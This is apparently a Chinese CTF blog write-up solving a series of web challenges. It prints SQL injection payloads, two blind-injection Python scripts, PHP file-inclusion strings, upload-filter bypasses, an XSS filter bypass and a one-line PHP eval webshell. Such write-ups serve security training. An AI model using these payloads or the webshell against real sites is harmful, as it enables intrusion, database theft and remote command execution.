找到了个ctf平台。里面的web挺多的。终于将web题目写的差不多了。
签到题
加群就可以了
直接F12
就看到了
Burp
抓包
文件名改成 1.jpg.php
即可
F12
改长度限制即可
阻止一直弹框,然后源代码
Unicode
解码下就可以了
右键源代码,看到gb2312
易想到宽字节注入
测试下
爆出数据库:
结合题目,得flag
Sql语句:$query = "SELECT * FROM temp WHERE id={$id} LIMIT 1";
可以用%00
绕过关键字过滤
爆出数据库:
Flag :
Burp抓包
,返回的包图片不一样. Intruder
多次试试
随便构造没用的参数发送就行了
根据length
查看就行了
源代码
eval
存在命令执行漏洞,构造出文件包含
Base64解码即可
后来得知可以这么写。
积累太少。
源代码
(和“百度杯”CTF比赛(二月场)题目一致)
提示flag在变量里。正则匹配只能大小写字符和数字。 eval("var_dump($$args);");
打印出变量的值。 利用超全局数组GLOBALS
可以打印出所有变量。
右键源代码 看见了一串js代码 先URL解码
就是拼接 67d709b2b54aa2aa648cf6e87a7114f1
提交
右键源代码,将JSfuck
代码扔进F12控制台
点下链接http://120.24.86.145:8005/post/index.php?file=show.php
发现File参数 易想到文件包含漏洞
PAYLOAD:http://120.24.86.145:8005/post/index.php?file=php://filter/read=convert.base64-encode/resource=index.php
Base64解码
利用注册页面的漏洞试试能不能getshell。显示操作失败。
所以只能先利用sql注入,注入出后台账号和密码。网上有很多注入exp。
花了一毛解密 a123456
在后台可以直接看到我们在注册页面上传的shell ,原来只是没回显。 菜刀连上去即可
利用网上已经知道的漏洞。
根据提示,列出目录开始找。
根据提示 用burp
爆破
点链接看到源代码
利用PHPmd5()漏洞
与strcmp()漏洞
容易看出考SQL注入
爆表:-1' union select 1,table_name,3,4 from information_schema.tables where TABLE_SCHEMA='skctf_flag' LIMIT 0,1
爆字段:-1' union select 1,column_name,3,4 from information_schema.columns where TABLE_SCHEMA='skctf_flag' and table_name='fl4g' LIMIT 0,1#
Flag:-1' union select 1,skctf_flag,3,4 from fl4g#
Flag base64
解码后还有base64
的字符 在解码 。 是串数字。根据提示就是要把那串数字POST过去 ,要短时间内。Python脚本:
#!usr/bin/env python
#!coding=utf-8
__author__ = 'zhengjim'
import requests
import base64
url ='http://120.24.86.145:8002/web6/'
r =requests.session()
headers = r.get(url).headers
key = base64.b64decode(base64.b64decode(headers['flag']).split(':')[1])
data={'margin':key}
print r.post(url=url,data=data).content
点进来URL
http://120.24.86.145:8002/web11/index.php?line=&filename=a2V5cy50eHQ=
a2V5cy50eHQ=
解码是keys.txt
所以替换成base64后的index.php。Line是行数
遍历获得源代码
得到源代码后,看出,构造cookie margin=margin
然后读keys.php
即可
过滤<
、>
用\u003cscript\u003ealert(_key_)\u003c/script\u003e
可绕过
发现提示1p.html
访问1p.html
后发现了一串WORDS。解码。有串base64解码 。在url解码
直接访问即可(出题人应该是忘记屏蔽了-。-)
正解应该是
看源代码:
txt参数的File_get_contents()
利用php://input
来绕过file
的include()
文件包含
读出hint.php
解码后:
在读flag.php
,结果提示不给flag 于是读下index.php
发现正则匹配file 不能包含flag
看到这段代码及hint.php
类有个 __toString()
构造函数,可以构造password的序列化。然后反序列读出flag.php
文件
根据提示 就是注册一个账号如下
admin a
然后就可以重置admin
密码,后登入即可。
看提示 猜测index.php
就是shell,于是直接利用
flag
根据源代码 GET 一个unname
和POST一个passwd
值不能相等,sha1要相等 ,提交数组。Sha1()均返回null
绕过
根据源代码
extract
可以将$_GET数组
的值转为变量,默认是如果有冲突,则覆盖已有的变量。
File_get_contents()
利用php://input
绕过。
一步步跟着匹配即可,[:punct:]
是匹配任何标点符号
看主页404,但和真正的404页面不一样,没什么发现,于是试了下robots.txt
发现了resusl.php
文件。
本来以为是伪造IP,然后注入得到password
,提交。然后均失败了。 试了下?x=admin
出现flag。。。
上传题。 各种方法尝试。发现是后缀名黑名单检测和类型检测
php别名:php2, php3, php4, php5, phps, pht, phtm, phtml
均试下。
发现php5
绕过
上面的Content-Type
的值 大小写绕过
点了没反应,提示:hint
多次尝试,发现GET一个hint
就有源代码
审计代码,要传一个cookie名为ISecer
的反序列的值。并且反序列后的值要全相等于"$KEY"
这里要注意是有双引号。
而且$KEY的传值的此之后的。所以反序列的值不是ISecer:www.isecer.com
。
我们要得到的值是string(0) ""
所以序列化该值即可。
给了源代码
是INSERT INTO
的注入,并且不能有,
否则会吃掉后面的语句
Payload:11'+(select case when (substring((select flag from flag ) from {0} for 1 )='{1}') then sleep(4) else 1 end ) and '1'='1
Python脚本
import requests
import string
url="http://120.24.86.145:8002/web15/"
allString=string.lowercase + string.uppercase + string.digits
flag=""
for i in range(1,33):
for str1 in allString:
data="11'+(select case when (substring((select flag from flag ) from {0} for 1 )='{1}') then sleep(4) else 1 end ) and '1'='1".format(str(i),str1)
# print data
headers={"x-forwarded-for":data}
try:
res=requests.get(url,headers=headers,timeout=3)
except requests.exceptions.ReadTimeout, e:
flag += str1
print flag
break
print 'flag:' + flag
看见file想到文件包含,php://filter/read=convert.base64-encode/resource=hello.php
失败。
右键源代码,发现有个upload.php
上传。所以上传一个带一句话木马的图片包含即可。
<?php
、 ?>
这两个被过滤了。换个姿势上传~
<?=eval($_POST['cmd']);
成功连接
根据题目sql注入 试了好久好久,于是请教他人。。。结果大牛说访问下flag
就行了。巨坑!
登入后台。根据这个构造账号密码 sun/sun19980321
看到隐藏文章
经人提醒才知道,是数据库
找到http://wp.bugku.com/phpmyadmin/ 登入
过滤了空格or and where + * union ,%0a %0b
等等
测试得出用 ^
Payload
import requests
url = 'http://47.93.190.246:49167/index.php'
r = requests.Session()
result = ''
for i in range(1,33):
for j in range(37,127):
payload = "admin1'^(ascii(mid((password)from({0})))>{1})#".format(str(i),str(j))
print payload
data = {"username":payload,"password":"asd"}
html = r.post(url,data=data)
if "password error!" in html.content:
result += chr(j)
print result
break
print result
跑出MD5解密 登入即可
看到登入框就试试有没有注入,源代码泄露。 发现.index.php.swp
存在
恢复成源码。
根据提示,知道了是利用cbc字符翻转攻击。
原理看文章:http://wooyun.jozxing.cc/static/drops/tips-7828.html
首先先post username = ‘qdmin’ password=’1’
会得到一个iv
和cipher
利用CBC字节翻转攻击将qdmin
的q
改成 a
后加密得到cipher
。
替换cookie[cipher]
的值 访问。
反序列化失败。 原因是第一个块数据(16字节)被破坏了。因为要username
要等于admin
所以不能利用文章里的说的填充字符。 又因为是第一个块数据被破坏,第一个块数据是和IV
有关,所以只要将在CBC字符翻转攻击,得到新的IV就可以修复第一块数据。
代入vi
即可